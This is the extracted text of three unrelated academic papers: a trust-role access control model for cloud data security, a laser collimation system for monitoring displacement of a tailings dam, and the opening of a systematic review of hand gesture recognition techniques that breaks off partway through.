computing access control model is proposed based on the combination of role-based and trust-based access control models. The model introduces the calculation of trust based on the role-based access control, that is, the user needs to verify the trust value in order to obtain the permission to access the data. Through the application in the local business system, it shows that the model can effectively solve the user's legitimate access to the data in the cloud, that is, to protect the security of the data in the cloud. The trust-based access control model has good advantages in terms of system throughput and storage space. As the number of user requests increases, both access control methods increase significantly in terms of throughput, but when the number of user requests reaches 10, the system throughput of both access control methods decreases, but based on trust - The role's access control method is always larger than the role-based access control method in terms of throughput, which roughly increases the total amount by about ten percent. Keywords-Cloud Computing Access Control; Data Security; Trust Value I. INTRODUCTION Cloud computing[1] is a commercial implementation of distributed processing, parallel processing, and grid computing development; its main features are large scale, virtualizable, high reliability, high scalability, and on-demand services. In a cloud environment, various resources are dynamically connected to the Internet, users can not only apply for services, but all participants in the cloud environment can dynamically join or quit[2]. However, with the popularization of cloud computing, cloud computing service security failures occur frequently, and the cloud security issues involved are increasingly prominent. For example, data stored in the cloud makes users have no absolute control over it, and cannot guarantee data integrity and confidentiality. Sex, and cloud service providers have some degree of untrustworthiness, etc., and this potential data security problem constrains cloud computing. Development in archival data management, and access control is one of the main means to solve data security problems. By studying several traditional access control methods, this paper introduces the concept of subject trust in the role-based access control method, and proposes a hybrid access control method based on "trust-role". The experiment proves that the method is to a certain extent. It can improve the credibility of the system, reduce the probability of task execution failure and spoofing, effectively solve the access of illegal users to resources and the unauthorized access of legitimate users, and ensure the integrity and confidentiality of data in the cloud. DOI: 10.21307/ijanmc-2019-050 mailto:1127787176@qq.com mailto:1341369601@qq.com International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 76 II. TRADITIONAL ACCESS CONTROL A. Autonomous Access Control and Mandatory Access Control Autonomous access control[3] is an access control policy based on subject authorization. This method is autonomous, but it makes the authority of the subject too powerful and the security level of the system is low. In the mandatory access control, the system's main body and object are given certain security attributes by the system administrator, and the subject cannot modify its own security attributes. However, its lack of flexibility and lack of consideration for authorization management are generally not used in large distributed environment systems. B. Role-Based Access Control Method In the role-based access control (RBAC) model, the concept of “role” is introduced[4]. The main idea is to separate the subject from the object. The access rights are not directly directed to the subject and the object, but are assigned to the role. This “user-role-privilege” relationship makes the access control method more flexible. However, as the number of roles increases, the relationship between the roles becomes more complicated, which reduces the security of the system in the case of affecting system performance. Furthermore, this passive security model is not well suited for distributed environments[5]. III. HYBRID ACCESS CONTROL BASED ON "TRUST-ROLE" MODEL A. Introduction of Trust Trust[6] is an assessment of the identity and activity of the subject and the activity in the system, and is closely related to its own reliability and integrity. Based on the role-based access control model, the concept of “trust” is introduced. When the subject tries to access the object resources, not only the role verification but also the trust value is calculated. System data is made more secure by trust and role double-layer verification. The acquisition of trust value[7] mainly has three aspects: direct trust degree, recommendation trust degree and historical operation trust degree. The direct trust degree is obtained through the subject's identity verification and user authority. The recommendation trust degree is mainly based on other subjects and object resources. The recommendation information is calculated, and the historical operation trust degree is the behavior record accumulated by the subject in the historical access to the object resource process. B. Basic Concept Description of the Model Definition 1 Entity User: Access data in a cloud computing environment. The subject of the resource, recorded as U; Definition 2 Role: The role is equivalent to the employee in the actual enterprise Role, recorded as R; Definition 3 Trust degree: Trust degree is the degree of trust of the subject to other subjects. In this model, the value of trust is [-1, 1]. The greater the trust value, the higher the access rights of the subject; Definition 4 Access rights: The power of the subject to access the system data resources. Depending on the role assigned to the subject, the subject has different permissions; Definition 5 Credibility threshold: The credibility threshold is a fixed value defined. When determining the trust value of an entity user, it needs to be compared with the minimum trust threshold. If the current trust value of the entity user is greater than the minimum trust threshold, then The next step can be accessed, otherwise, the access cannot be continued; Definition 6 Session: A session is an event process that is triggered when an entity user activates a role they own. The real user can activate multiple roles in one session, denoted as S. C. Calculation of Trust Values In a cloud computing environment, when a principal user requests a resource access, the credibility International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 77 management center shall calculate the credibility of the user. In the calculation, if the credibility is greater than a certain credibility threshold, the authorization center can assign the corresponding role to the user, and the user can access the object resource. In this model, trust includes: direct trust recommended trust and historical operational trust. 1) Direct trust (DT) The acquisition of direct trust is calculated based on the identity verification and user rights of the subject and the environment information; When the user logs in to the system for the first time, the system administrator must provide his or her identity information and environment information. The system administrator will calculate the direct trust of the user based on the information. The formula is:  Where R(i, s), R(p, s), R(e, s) are the correlations between the identity information, rights, environmental information and system security of the entity user determined by the security administrator, respectively, is the weight of identity information, authority, and environmental information in direct trust. 2) Historical operation trust (HT) Historical operational trust is a record of behavior accumulated by the subject user during historical access to the guest resource. The access of the main user to the resource is divided into normal access and abnormal access. A normal access is an access request that meets a system security rule that is filed within a specified time period, while a non-normal access is an access request that violates a system security rule that is filed within a specified time. When the user is performing normal resource access request behavior then the user's historical operation trust is improved, and the historical operation trust is reduced. Its calculation formula:   Where H(m,i,t) is the trust value of the access of the subject user m to the guest resource at time t . is the definition coefficient for this access.If it is a normal access, vi takes a positive value, and if it is an abnormal access, it takes a negative value. 3) Recommended trust (RT) The recommended trust degree is the recommended trust degree of the main user to other main users. Generally, the recommendation trust degree of one user to another user can refer to the recommendation trust degree of other users. Its calculation formula:   Where S(m,i)i is the degree of satisfaction of the entity m with respect to the entity n at the ith operation, and D(m,i)i is the score of the entity m for the entity n at the ith operation. 4) Calculation of final trust (FT) The ultimate trust is the direct trust available based on previous calculations. The sum of the degree of trust in the historical operation and the recommended trust degree, the weights of the three trust degrees are WDT, WHT, WRT, and the sum of the three weights is equal to 1. The final trust is calculated as:   D. Trust-role-based access control algorithm When the user makes a request to access the resource, the cloud computing authorization center creates a session S for the subject user by verifying the information of the subject user, establishes a trust relationship between the system and the subject user U, and calculates the trust degree of the subject user U, the subject user. U Select the role to be activated in this International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 78 session. The system applies the credibility of the user U to the access rights of the role according to the trust constraint conditions, and obtains the current effective access rights of the subject user. The specific algorithm steps are as follows: 1) When the entity user needs to access the resource, first submit the account and password that he has logged in and the data resource that needs to be requested to the cloud computing authorization center; 2) The cloud computing authorization center checks the information submitted by the entity user, determines whether to establish a session, and if so, establishes a session between the system and the user, and forwards the information submitted by the user to the cloud computing role database; 3) The cloud computing role database determines the role that the user needs according to the information sent by the authorization center, assigns the role to the user, and forwards the information to the cloud computing trust value database; 4) The cloud computing trust value database determines whether to grant the authority to the role assigned to the user according to the current trust value of the user. If the current trust value of the user is greater than a predetermined minimum threshold, the authority is given, otherwise Reject and return this information to the Cloud Computing Authorization Center; 5) After the cloud computing authorization center saves the information of the cloud computing trust value database, it will return an authorization success certificate to the user, and the user can carry the authorization success certificate to access the resource database. After the resource database is checked, the user can access the information. Data resources that need to be accessed; 6) After the conclusion of the meeting, users and sources shall evaluate the satisfaction of the parties and submit the results to the trust value database for calculation and update of the trust value. IV. BASED ON THE "TRUST-ROLE" ACCESS CONTROL MODEL APPLICATION Aiming at the security problem of cloud environment, this paper introduces the trusted mechanism into the traditional access control mode, proposes the access control model based on trust-role, and conducts experiments in the local business system. The cloud platform is built through Hadoop architecture. Firstly, the local database is migrated to the distributed data base HBase, and then the access control model is applied in the local business system. In other words, the user's identity, credibility and other information are verified at the same time. Finally, the advantages of this model in system throughput and data storage cost are obtained through simulation experiments. A. Construction of hadoop cloud platform 1) Install Linux virtual machine Install the VMware Workstation10 and install the Linux virtual machine. The Linux system is ubun-tu12. 04. 2) Install JDK Install the JDK - 6 u43 - Linux - i586. Bin, and set its environment variable. 3) Configure SSH password-free login Installation command:$ sudo apt-get install ssh 4) Install hadoop, zookeeper and hbase Take hadoop-1 separately. 2. 1. The tar. Gz, the zookeeper - 3. 4. 6. The tar. Gz, hbase - 0. 94. 26. The tar. Three files of gz are decompressed and put into the target document folder, then the environment variables of Hadoop are configured, and the configuration files of Hadoop, zookeeper and hbase are modified respectively. B. Application of the model in local business systems 1) System flow chart shown in Figure 1 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 79 Figure 1. Business System Flowchart 2) System user login processing The user to enter your login account and password, login request to the server, the server receives the request, after looking for value table with a table and trust, and find the attribute information, the user first line into the user name and password match, if the match is successful, by the trust of the user ID to find its corresponding value, through the three kinds of trust value calculated finally trust value, compared with the threshold of system setting, if not smaller than the threshold, through carries on the Angle of color reflected beam, root, according to the Angle of color not to grant to the users of different operating as xu can, And the number of interchanges will be increased by 1, the new user's trust value; If it fails, the user is unable to log in, and according to the user ID, the number of non-normal operations is increased by 1, and the new letter value is obtained. The user login interface is shown in figure 2. Figure 2. business system login interface C. Simulation experiment Simulation experiments mainly compare the access control model based on "trust-role" and the access control model based on role from the aspects of system throughput and data storage cost. See figure 3 and figure 4. Figure 3 shows the storage space comparison required for the two access control methods to store access control information, indicating that the amount of storage space required for the trust-based access control method does not increase significantly as the number of users increases. Figure 3. storage space comparison chart International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 80 Figure 4. System throughput comparison chart Figure 4 shows a comparison of the system throughput between the two access control methods, showing that both access control methods increase significantly in throughput as the number of user requests increases. However, when the number of user requests reaches 10, the system throughput of both access control methods is decreasing, but the trust-based access control method is always larger in throughput than the role-based access control method. V. CONCLUSION This paper adds the concept of credibility to the traditional role-based access control model, and proposes a hybrid-access-based hybrid access control model in cloud computing. This model makes up for the shortcomings of role-based access control methods. Experiments show that this model has great advantages in system user authentication, and the trust-based access control model has good advantages in system throughput and storage space. ACKNOWLEDGMENT New Network and Inspection and Control National Local Joint Engineering Lab. Fund Project (GSYSJ20170009) http://www.ijanmc.org REFERENCES [1] Li Qiao, Zheng Xiao. Summary of the status quo of cloud computing research [J]. Computer Science, 2011, 38(4): 32-37. [2] Chen Quan, Deng Qianni. Cloud computing and its key technologies [J]. computer application,2009, 29 (9): 2562-2567. [3] Long Qin, Liu Peng, Pan Aimin. Role-based extension manageable access control model research and implementation [J]. Computer Research and Development, 2005, 42(5): 868-876. [4] Luo Xueping, Zheng Yuli, Xu Guoding. An extended role-based access control model [J]. Computer Engineering, 2001, 27 (6): 106-107. [5] Liao Junguo, Hong Fan, Xiao Haijun, et al. Fine-grained role-based access control model [J]. Computer Engineering and Applications, 2007, 43(34): 138-140. [6] Deng Yong, Zhang Lin, Wang Weichuan, et al. Research on dynamic role access control based on trust degree in grid computing [J]. Computer Science, 2010, 37(1): 51-54. [7] Lin Qingguo, Liu Yanbing. A trust-based dynamic access control strategy [J]. Journal of Chongqing University of Posts and Telecommunications (Natural Science Edition), 2010, 22(4): 478-482. work_qht6crxtgndgtjcmaevau32wnm ---- 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 73 The Design and Implementation of Displacement Monitoring System for Tailings Dam Guoshao Chen School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, China e-mail: 1825247141@qq.com Zhichao Lian School of Computer Science and Engineering, Xi’an Technological University, Xi’an, 710021, China e-mail: 965941167@qq.com Abstract—Non-coal mining generally produces a large amount of tailings, and tailings usually accumulate in the canyon between two mountains, and the downstream of the tailings is intercepted by the dam. The dam is called a tailings dam. The development of safety monitoring technology for tailings dam is accompanied by the history of dam construction. The safety of tailings dam is not only related to the normal operation of mining industry, but also to the life safety of downstream residents. Once the tailings dam break, the loss caused by the dam is inestimable. In this paper, the laser collimation system is used to monitor the displacement of the dam, and the center of light is measured by the center of gravity, and the laser beam is reconstructed by a lens. The method has the advantages of high accuracy and simultaneous detection of horizontal displacement and vertical displacement of tailings dam. It is a new monitoring technology for dam displacement and has good application prospects. Keywords-Dam Displacement; Center of Gravity Method; Laser Spot I. SUMMARY Human beings have begun to develop and use mineral resources a long time ago. China has a rich variety of mining industries, and the mining industry is the basis of various industries. Minerals can't be 100% purity. During the smelting process, the impurities in ores are separated. Because the value of impurities can be very small, they accumulate in tailings. With the improvement of smelting technology, the utilization ratio of minerals is becoming higher and higher, but there are still some tailings. A tailings dam has been formed and the tailings dam is used to prevent the dams from tailings. In our country, thousands of such tailing dams are standing large and small. The collapse of the tailings dam occurred, which caused great loss to the life and property of the country and the people, and caused serious pollution to the natural environment. In September 8, 1998, a special dam break occurred in Linfen, Shanxi, which killed 254 people and had a very bad impact on the society. In September 21, 2010, tin tailing dam of Guangdong Xinyi Qian Pai Village in Zijin Mining Co. the dam failure occurred, the accident caused 6 people missing, 5 people were killed and 7 injured. Because of various reasons, many countries have occurred dam break in history. In December 2, 1959, the French Marce broke down. Because the management failed to analyze the dam monitoring data in time, it resulted in a disaster that could be avoided. Although the history of damming is accompanied by the history of human civilization, it has a history of thousands of years. However, due to various uncertain factors of the dam body, it is difficult to detect the safety of the dam. Early monitoring is simply a simple appearance check, and no scientific monitoring means. By the middle of twentieth Century, the dam safety monitoring theory system was basically formed. With the appearance of some monitoring instruments and monitoring methods, vertical line method, triangulation method and precise leveling method were used to measure horizontal displacement and vertical displacement. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 74 According to the technical code for safety monitoring of dam (SL 60-94) promulgated in 1994 and the technical code for safety monitoring of concrete dams issued in 2003 (DL/T5178-2003), dam safety monitoring projects generally include the following 5 aspects. 1) Monitoring of working conditions: also called environmental monitoring, mainly including water level, water temperature and freezing and so on. 2) Deformation monitoring: mainly including the horizontal displacement of the dam and the vertical displacement of the dam. 3) Water leakage monitoring: mainly including the infiltration line of the dam. 4) Pressure monitoring: mainly including the temperature of the dam, the earth pressure and so on. 5) Other monitoring: mainly including earthquake monitoring. II. SYSTEM OVERALL DESIGN In this paper, the image processing method is used to measure the displacement of the dam, and its structure is shown in Figure 1 . Figure 1. System structure The laser and laser receiver are fixed on both sides of the mountain. The lens is mounted on the dam body. The laser uses a helium neon laser, and the laser emitted from the light source is projected to the laser receiver through the lens. The laser will form a spot on the receiver. The laser, lens, and laser receiver are in the same line in the ideal condition. When the dam displacement occurs, it will drive the lens to move. The corresponding image is also moving on the laser receiver. By measuring the displacement of the spot on the detector, we can get the displacement of lens system further. Figure 2. Monitoring schematic 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 75 Figure 2 is a monitoring schematic. L is a laser, a lens is M, and the center of M is O and O ', y and y' as a laser spot on the laser receiver. When the lens is at O, the L passes through the M imaging at the Y point; when the lens is moved to O ', the spot moves to y'. The displacement distance of the lens can be calculated by the CCD system, which is behind the laser receiver, to collect the displacement of the spot. According to the trigonometric relationship 2 1 21 1 )( l l xx x    Assuming that the location of the lens is only moving up and down, the length of x1 and x2 is known. As long as we can detect the displacement of Y accurately, we can further calculate the displacement of the dam. The deformation of the dam body can be obtained by measuring the displacement of each measuring point installed on the dam body. The images captured by the CCD camera should be a perfect dot in the ideal situation. But in practice, there are inevitably some diffraction phenomena, and all kinds of other disturbances will be the deformation of the spot, so that the ideal center position of the spot will be deviate from the actual position. So we must first filter the image collected by CCD to carry out the next process. III. GRAVITY METHOD In this paper, the center of laser spot is extracted by the method of center of gravity extraction. When using the center of gravity method to deal with the spot, the image is first two valued, and then the spot area is identified. The accuracy of this method is relatively high and the speed is faster. The center of gravity method is only applicable to the symmetry pattern. If the image is asymmetrical, there will be a lot of deviation. The basic principle of the gravity method is to replace the geometric center of the image with the energy center of the image. The gray value of the pixel of the image is P. The center of gravity coordinates are (x, y)     i ii p px x      i ii p py y  ni ....3,2,1 In order to improve the reliability of the system, every measuring point must be measured several times, and the position of the spot can be calculated according to the measured data. CCD is repeatedly sampled to get the average value, so as to improve the accuracy. IV. HARDWARE INTRODUCTION The system consists of six parts is shown in figure 3: Figure 3. System hardware A. Laser The laser has high luminance, very small divergence angle and good monochromatic property; because of these unique properties, it is used as a quasi straight line in this system. B. Lens system In this system, the beam of laser is reshaped, the quality of beam is improved, and the accuracy of measurement is improved. Optical lens is used to realize it. In practical application, Fresnel Lens is used. C. Laser receiver The translucent scattering glass similar to the wool glass is convenient for the camera to collect the spot of the light spot. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 76 D. Camera The receiver module uses the camera, and the application of the camera is very common. In this system, it is mainly used to accept the laser spot image. E. Processor An intelligent chip is used to analyze the image, and the amount of displacement is calculated. It mainly includes hardware design and software design. And the data will be sent to the wireless module. F. Zigbee wireless module The system uses the wireless module to transmit the deformable data to the base station, and overcomes the difficulty of long distance wiring, and uses the popular Zigbee to implement it. Zigbee is a wireless network transmission technology which has been developed in recent years, which is adaptable to short distance, low rate and low power consumption. V. CONCLUSION In this paper, the dam displacement monitoring system is designed in detail, including hardware structure design and image processing algorithm. The system is tested in the tailings dam, the data is accurate. Due to the transmission of laser in the air, the visibility of the air is reduced, the brightness of the laser spot is insufficient, so the data cannot be collected sometimes. ACKNOWLEDGMENT Fund support: Shaanxi Education Department Special Fund Project number: Shaanxi Education Finance[2013] 23 VI. REFERENCE [1] Tailings beach length monitoring system research based on digital image processing Zhang Yulei [2] Tailings dam displacement monitoring system based on laser collimation method design Ru Naiyu [3] Tailings safety monitoring system based on Silverlight Zhang Cheng [4] High precision positioning algorithm for laser spot center research Chen he; Yang Zhihao; Guo pan; Zhang Yinchao; Chen Siying Beijing Institute of Technology Journal. [5] Astronomical instruments in image tracking algorithm of the comparative study of Wang Lili; Hu Chinese; season Hangxin astronomy. work_qivwkxnmazbqll5lutx7ibnvke ---- Submitted 5 January 2019 Accepted 14 August 2019 Published 16 September 2019 Corresponding author Mais Yasen, mai20130045@std.psut.edu.jo Academic editor Luciano Fadiga Additional Information and Declarations can be found on page 21 DOI 10.7717/peerj-cs.218 Copyright 2019 Yasen and Jusoh Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS A systematic review on hand gesture recognition techniques, challenges and applications Mais Yasen and Shaidah Jusoh Department of Computer Science, Princess Sumaya University for Technology, Amman, Jordan ABSTRACT Background. With the development of today’s technology, and as humans tend to naturally use hand gestures in their communication process to clarify their intentions, hand gesture recognition is considered to be an important part of Human Computer Interaction (HCI), which gives computers the ability of capturing and interpreting hand gestures, and executing commands afterwards. The aim of this study is to perform a systematic literature review for identifying the most prominent techniques, applications and challenges in hand gesture recognition. Methodology. To conduct this systematic review, we have screened 560 papers retrieved from IEEE Explore published from the year 2016 to 2018, in the searching process keywords such as ‘‘hand gesture recognition’’ and ‘‘hand gesture techniques’’ have been used. However, to focus the scope of the study 465 papers have been excluded. Only the most relevant hand gesture recognition works to the research questions, and the well-organized papers have been studied. Results. The results of this paper can be summarized as the following; the surface electromyography (sEMG) sensors with wearable hand gesture devices were the most acquisition tool used in the work studied, also Artificial Neural Network (ANN) was the most applied classifier, the most popular application was using hand gestures for sign language, the dominant environmental surrounding factor that affected the accuracy was the background color, and finally the problem of overfitting in the datasets was highly experienced. Conclusions. The paper will discuss the gesture acquisition methods, the feature extraction process, the classification of hand gestures, the applications that were recently proposed, the challenges that face researchers in the hand gesture recognition process, and the future of hand gesture recognition. We shall also introduce the most recent research from the year 2016 to the year 2018 in the field of hand gesture recognition for the first time. Subjects Human–Computer Interaction Keywords Hand gesture, Hand gesture applications, Hand gesture recognition challenges, Recognition techniques, Recognition INTRODUCTION A summary of the identification and selection of articles for inclusion in this review is presented in Fig. 1, according to the PRISMA statement (Moher et al., 2009). Hand gestures are a non-verbal method of communication using the movements of the human How to cite this article Yasen M, Jusoh S. 2019. A systematic review on hand gesture recognition techniques, challenges and applications. PeerJ Comput. Sci. 5:e218 http://doi.org/10.7717/peerj-cs.218 mailto:mai20130045@std.psut.edu.jo https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.218 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.218 Figure 1 PRISMA flow diagram of the study selection process. Full-size DOI: 10.7717/peerjcs.218/fig-1 hand. This method is used either on its own or with another parallel communication method such as speech (Adam, 2004). The movements of a hand on the air as shown in Fig. 2 (Rosalina et al., 2017), is an example of a sign language using hand gestures. The representation of hand gestures is varying from reflecting a certain action to delivering a message that actually has a meaning (Adam, 2004). Hand Gestures are considered to be culture dependent, which means one gesture can range from giving a complimentary meaning to a giving a highly offensive meaning (Adam, 1994). Hand gestures are widely distributed on different kinds of applications, ranging from applications that are connected to the safety of humans, such as using hand gestures in controlling and directing flights Yasen and Jusoh (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.218 2/30 https://peerj.com https://doi.org/10.7717/peerjcs.218/fig-1 http://dx.doi.org/10.7717/peerj-cs.218 Figure 2 Examples of hand gestures in sign language (Rosalina et al., 2017). Full-size DOI: 10.7717/peerjcs.218/fig-2 operations (landing and taking off), to applications that are made for pleasure purposes, such as using it in gaming (Mohini et al., 2015). With the development of today’s technology, and as humans tend to naturally use hand gestures in their communication process to clarify their intentions, hand gestures can play an important role in interchanging information between humans and computers (Aashni et al., 2017). In Human–Computer Interaction (HCI), hand gestures have a wide number of applications that can guarantee the speed of communicating with the computer, give a user-friendly and aesthetic environment that would attract users, provide a nonphysical contact with the computer from a distance for user comfort and safety, and control complex and virtual environments in a much easier approach (Andrea, 2014). On the other hand, hand gesture applications demand the user to be an expert and well trained at employing and understanding the meaning of different gestures (Samata & Kinage, 2015). There are many possible numbers of hand gestures; therefore, for each application, a different group of gestures is used to perform its operations. Also, from Yasen and Jusoh (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.218 3/30 https://peerj.com https://doi.org/10.7717/peerjcs.218/fig-2 http://dx.doi.org/10.7717/peerj-cs.218 the computer perspective, the performance of recognizing hand gestures is affected by the environmental surroundings (such as light, background, distance, skin color) and the position and direction of the hand (Vaibhavi et al., 2014). Perceptual computing is providing the computers with the ability of knowing what is happening around it (Bradley, 2015). In other words, the computer is capable of recognizing the different users and the different environmental factors occurring and existing in its surrounding. With that being said, hand gesture recognition is a type of perceptual computing user interface, that is used in HCI to give the computers the capability of capturing and interpreting hand gestures, and executing commands based on an understanding made on a certain gesture (Meenakshi & Pawan Singh, 2011). Hand gesture recognition technique steps vary from simple to complex applications. Generally, the steps are usually divided as the following: first hand gesture frame acquisition, then hand tracking, then feature extraction, and finally classification to reach the output gesture. Hand gesture frame acquisition is to capture the human hand gesture by the computer (Ananya, Anjan Kumar & Kandarpa Kumar, 2015). Whereas hand tracking is the ability of the computer to trace the hand and separate it from the background and from the surrounding objects (Ananya, Anjan Kumar & Kandarpa Kumar, 2015). The features needed to be extracted changes from one application to another, some of the features that could be taken into consideration are: fingers status, thumb status, skin color, alignments of fingers, and the palm position (Ananya, Anjan Kumar & Kandarpa Kumar, 2015). In artificial intelligence, machine learning enables the computers to learn without being explicitly programmed (Margaret, 2016). There are two types of learning; the process when algorithms reflect the gestures that has been learned in the past in training to new gestures is called supervised machine learning, and the process when algorithms draw inferences from the gestures is called unsupervised machine learning. Classification aims of building a model to classify new hand gestures based on previous training gestures. The research work in hand gesture recognition has been developing for more than 38 years (Prashan, 2014). In 1977, a system that detects the number of fingers bending using a hand glove was proposed by Zimmerman (Praveen & Shreya, 2015). Furthermore, Gary Grimes in 1983 developed a system for determining whether the thumb is touching another part of the hand or fingers (Laura, Angelo & Paolo, 2008). In 1990, despite the limited computer processing powers, the systems developed then gave promising results (Prashan, 2014). The field of hand gesture recognition is very wide, and a big amount of work was conducted in the last 2 to 3 years. In this research, we survey the latest researches that were done on hand gesture recognition. We shall also compare the different techniques, applications, and challenges presented by the surveyed work. The reason why the most recent research articles from IEEE database were chosen to be studied is that we wanted to construct a valid base of the current situation and technologies of hand gesture recognition. Furthermore, the articles published by IEEE in the year of 2016 to 2018 were considered to increase the intensity and focus of this study, and because the recent works were not sufficiently studied before, where the older ones were studied and compared more such Yasen and Jusoh (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.218 4/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.218 as in Rafiqul & Noor (2012), Arpita, Sanyal & Majumder (2013) and Deepali & Chitode (2012). The contribution of this research can be summarized as the following: 1. Introducing the most recent researches from the year 2016 to the year 2018 in the field of hand gesture recognition for the first time. 2. Comparing the different techniques proposed, applications applied, and challenges discussed in the current available technology of hand gestures recognition. The paper is structured as follows: Survey methodology section describes the research questions and methods used. The following section includes the results and analysis of the work studied. Then the next section discusses the future of hand gesture recognition. The last section concludes the research. SURVEY METHODOLOGY This review is guided by the following three research questions: 1. What are the techniques used in hand gesture recognition? 2. What are the domains and applications that make use of hand gesture recognition? 3. What are the challenges in hand gesture recognition applications? The first step of this systematic literature review is gathering all retrieved documents from the year 2016 to the year 2018, where the process of screening includes downloading the papers published on IEEE Explore, and reading their titles and abstracts. Two main keywords were used for the search process: hand gesture recognition and hand gesture techniques, other keywords were also used (such as hand gestures, hand gesture systems, hand gesture classification, hand gesture feature extraction, and sign language recognition) to include synonyms, where the keywords focused on the domain of research questions. The search process was performed by both authors (Mais Yasen and Shaidah Jusoh). A summary of the identification and selection of articles for inclusion in this review is presented in Fig. 1, according to the PRISMA statement (Moher et al., 2009). Literature included 1,045 studies. After removing duplicates, 560 titles were screened. The duplication occurs because the same work was retrieved more than once when multiple keywords were used. Then, 316 papers were excluded for having titles with no relevance to the review questions in general, where titles were scanned and processed by all authors to specify whether the works are pertinent to any chosen subcategory of hand gesture recognition. The next step was screening abstracts of all 244 retrieved documents. All 244 papers were reviewed and evaluated in reference to the research questions, where authors read the abstracts and evaluated whether they can find an answer to any of the core questions of this review, for example some of the papers excluded were discussing the electrical aspect of hand gesture acquisition methods, this process excluded 100 papers out of 244. Full papers of 144 potentially relevant references were selected for further examination. After reading the full papers, 49 poorly organized documents that do not have a clear methodology justification were removed due to lack of validation and weakness of results justification; for example, some of the works excluded did not explain why they chose their approach of acquisition or classification in comparison with all the possible approaches available in the recent technology, or did not explain why their proposed approach performed in the Yasen and Jusoh (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.218 5/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.218 Table 1 Classification of extracted papers. Topic Sub-topics References count Gesture acquisition methods 58 Feature extraction 51Hand gesture techniques Classification of hand gestures 71 Sign language 22 Robotics 11 Hand gesture recognition applications Others 20 Environmental surroundings 18Hand gesture recognition challenges Training and testing data 13 way they provided. Only 95 papers were selected to be included in this paper. Overall, the selection was made by the authors based on two criteria; relevance to the research questions, organization and form of writing of the papers studied. Classification of the selected paper is demonstrated in Table 1 which also shows the number of papers (intersected) included in each class and subclass. 180 papers were relevant to Hand Gesture Techniques, 53 papers were relevant to Hand Gesture Recognition Applications, and 31 papers were relevant to Hand Gesture Recognition Challenges. RESULTS AND ANALYSIS The procedure of hand gesture recognition is conducted by executing several steps as illustrated in Fig. 3; image frame acquisition or gesture acquisition is to capture the human hand gesture image by the computer (Ananya, Anjan Kumar & Kandarpa Kumar, 2015). This could be done using vision-based recognition where no special gadgets are required, and a web camera or a depth camera is used, furthermore special tools can be utilized such as wired or wireless gloves that detect the movements of the user hand, and motion sensing input devices (Kinect from Microsoft, Leap Motion, etc.) that captures the hand gestures and motions. Hand tracking process is the ability of the computer to trace the user hand and separate it from the background and from the surrounding objects (Ananya, Anjan Kumar & Kandarpa Kumar, 2015). This can be done using multi-scale color feature hierarchies that gives the users hand and the background different shades of colors to be able to identify and remove the background, or by using clustering algorithms that are capable of treating each finger as a cluster and removing the empty spaces in-between them. The features extracted change from one application to another, some of the features that could be taken into consideration are: fingers status, thumb status, skin color, alignments of fingers, and the palm position (Ananya, Anjan Kumar & Kandarpa Kumar, 2015). These features and other features can be extracted using several methods available, such as Fourier descriptor method which captures the palm, the fingers and the finger tips, or centroid method which captures the essential structure of the hand. The features extracted are then sent to training and testing the classification algorithm (such as Artificial Neural Networks (ANN), K-nearest neighbor (KNN), Naive Bayes (NB), Yasen and Jusoh (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.218 6/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.218 Figure 3 The basic steps of hand gesture recognition. Full-size DOI: 10.7717/peerjcs.218/fig-3 Support Vector Machine (SVM), etc.) to reach the output gesture, for example the output gesture in a simple case can contain two classes to detect only two gestures such as open and closed hand gestures. In this section, we will be discussing the papers that were extracted in reference to the research questions in details, where Fig. 4 demonstrates the results of this review, answering each research question by showing the most popular method used in each subcategory. Hand gesture recognition techniques The focus of our review in this section is on different gesture acquisition methods that has been used, the features considered for different applications and the feature extraction methods applied on the images to abstract those features, and finally the classification algorithms that has been recently used for classifying hand gestures. Gesture acquisition methods Image hand gesture acquisition, as illustrated in Fig. 5 from Microsoft (2019) is to capture the human hand gesture image by the computer (Ananya, Anjan Kumar & Kandarpa Kumar, 2015). This could be done using vision-based recognition where no special gadgets are required and a web camera or a depth camera is used, furthermore special tools can be utilized such as wired or wireless gloves that detect the movements of the user hand, and motion sensing input devices (Kinect from Microsoft, Leap Motion, etc.) that capture the hand gestures and motions as showed in Fig. 5. Several methods for hand gestures acquisition were discussed in the work studied using different acquisition tools, part of them used images that were captured in real time and others used previous images that were recorded in databases. Another classification to be considered is the nature of the acquisition which can be either a static hand gesture recognition where the gestures are represented by a constant image, or a dynamic hand gesture recognition were gestures are represented by the movement of the hand. The first method is using vision-based hand gesture recognition to extract images which was proposed by Weiguo et al. (2017), Ananyaa et al. (2017), Alvi, Fatema & Mohammad (2016), Shome (2017). Where in Weiguo et al. (2017) it was built in a real-time system. In Oinam et al. (2017) the authors implemented two different techniques of vision-based hand gesture recognition and one data glove-based technique. The vision-based techniques are static hand and real-time hand gesture recognition techniques. In data glove-based Yasen and Jusoh (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.218 7/30 https://peerj.com https://doi.org/10.7717/peerjcs.218/fig-3 http://dx.doi.org/10.7717/peerj-cs.218 Figure 4 Results. Each research question is illustrated in this figure, along with the suggested subcate- gories and the most common technique or problem resulting in them. Full-size DOI: 10.7717/peerjcs.218/fig-4 Figure 5 Example of hand gesture recognition using Kinect gestures (Microsoft, 2019). Full-size DOI: 10.7717/peerjcs.218/fig-5 technique the 